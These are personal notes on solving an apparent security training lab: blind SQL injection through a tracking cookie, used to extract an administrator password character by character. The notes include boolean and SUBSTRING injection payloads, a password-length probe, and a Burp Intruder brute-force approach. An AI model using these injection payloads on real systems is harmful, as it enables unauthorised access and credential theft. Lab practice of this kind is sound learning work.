TASK:
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.


PS sql query in backend:

SELECT COUNT(*)
FROM Users
WHERE TrackingId = 'tPGzVO8ujVveNiUn'

if there are any rows returned then send back the welcome back message on front encode


What I want the query to look like

SELECT COUNT(*)
FROM Users
WHERE TrackingId = 'tPGzVO8ujVveNiUn'' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'a


testing ' AND '1'='1 onto the end of the trackingId, returns welcome back

testing ' AND '1'='2 onto the end of the trackingId, returns NO welcome back

based on this boolean logic, if i now use ' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'a
it should return welcome back, however getting no welcome back...

used this ' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 9, 1) > 'a 
worked however very tedious, potentially some better way of doing it... perhaps using python script

eventually got back this for the password:
rharxujq (which is wrong :/)


this didnt work however for the password, not sure why...
going to check the length of the password by using the query:
' AND (SELECT username FROM users Where LENGTH(password) = 20 AND username = 'administrator') = 'administrator

By using this query i found the password length to be 20...

Realise my mistake i was only checking for letters with the previos query, as when i queried using:
' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 9, 1) > '0

This returned true!


THIS IS ALL WRONG, SHOULD HAVE SENT TO INTRUDER

makes it so much easier to brute force this

the burpsuite cluster bomb could be improved by removing the substring index when the index is found so 
that in the next round it is taken out

security of website could retrun the same length of chars even if the user does get in???


final password for username administrator after cluster bomb of Blind SQL Injection:
rharxujq62w35xzsb8q0

new email: igotyourpasswordviabruteforce@badguy.co.uk
